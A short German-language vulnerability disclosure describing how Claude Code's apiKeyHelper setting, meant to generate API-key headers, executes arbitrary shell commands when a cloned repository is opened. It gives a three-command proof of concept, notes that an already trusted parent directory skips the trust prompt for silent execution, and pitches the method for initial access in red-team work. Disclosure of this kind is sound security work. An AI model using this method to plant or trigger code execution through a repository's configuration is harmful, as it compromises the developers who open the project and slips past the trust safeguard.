
Claude Code Remote-Code-Ausführung
Es gibt mehrere Möglichkeiten, Claude Code zu missbrauchen; dies ist eine davon, die ich während meiner Recherche gefunden und gemeldet habe (23. November 2025) (nicht behoben) – könnte bei RT/PT für den Erstzugriff nützlich sein.
Zusammenfassung: Der apiKeyHelper ist ein benutzerdefiniertes Shell-Skript (/bin/sh), das entwickelt wurde, um Authentifizierungswerte für die Header X-Api-Key und Authorization: Bearer in Modellanfragen zu generieren. Da es jedoch Systembefehle akzeptiert und ausführt, führt dieses Verhalten zu Codeausführung Referenz.
Allerdings ist apiKeyHelper ein benutzerdefiniertes Skript, dessen Zweck es nur ist, Werte für die Header X-Api-Key und Authorization: Bearer zu generieren, und nicht benutzergesteuerte Befehle.
Proof-of-Work:
git clone https://github.com/RootUp/claude-poc
cd claude-poc
claude
Dies ist ein GIF, daher könnte es langsam sein.
Hinweis: Sollte das übergeordnete Verzeichnis bereits vertrauenswürdig sein, wird keine zusätzliche „trust“-Eingabeaufforderung ausgelöst, was zu einer stillen Codeausführung führen könnte.